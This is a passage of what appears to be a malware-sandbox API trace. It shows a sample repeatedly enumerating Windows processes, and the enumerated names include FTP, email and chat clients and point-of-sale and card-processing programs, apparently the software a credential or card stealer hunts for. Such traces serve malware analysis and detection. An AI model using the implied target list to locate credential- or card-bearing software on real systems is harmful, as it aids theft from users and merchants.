pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0254.134] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0254.136] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0254.138] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0254.139] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0254.141] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0254.142] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0254.144] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0254.146] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0254.164] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0254.166] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0254.169] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0254.171] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0254.172] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0254.175] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0254.179] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0254.180] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0254.182] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0254.184] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0254.186] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0254.189] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0254.191] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0254.193] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0254.195] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0254.197] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0254.200] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0254.202] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0254.204] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0254.206] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0254.209] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0254.211] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0254.214] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0254.218] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0254.220] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0254.222] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0254.224] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0254.226] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0254.229] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0254.231] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0254.233] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0254.235] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0254.237] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0254.239] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0254.241] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0254.243] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0254.245] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0254.247] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0254.249] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0254.251] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0254.256] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0254.258] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0254.260] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0254.262] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0254.264] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0254.265] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0254.267] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0254.269] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0254.271] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0254.274] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0254.276] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0254.278] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0254.279] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0254.282] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0254.283] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0254.285] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0254.287] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0254.289] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0254.291] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0254.295] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0254.299] CloseHandle (hObject=0x2060) returned 1 [0254.299] Sleep (dwMilliseconds=0x64) [0254.410] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0254.426] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.428] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0254.431] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0254.433] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.435] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0254.437] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.439] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0254.441] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0254.443] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0254.451] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.453] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.455] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0254.457] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.459] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.464] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.466] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.469] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: 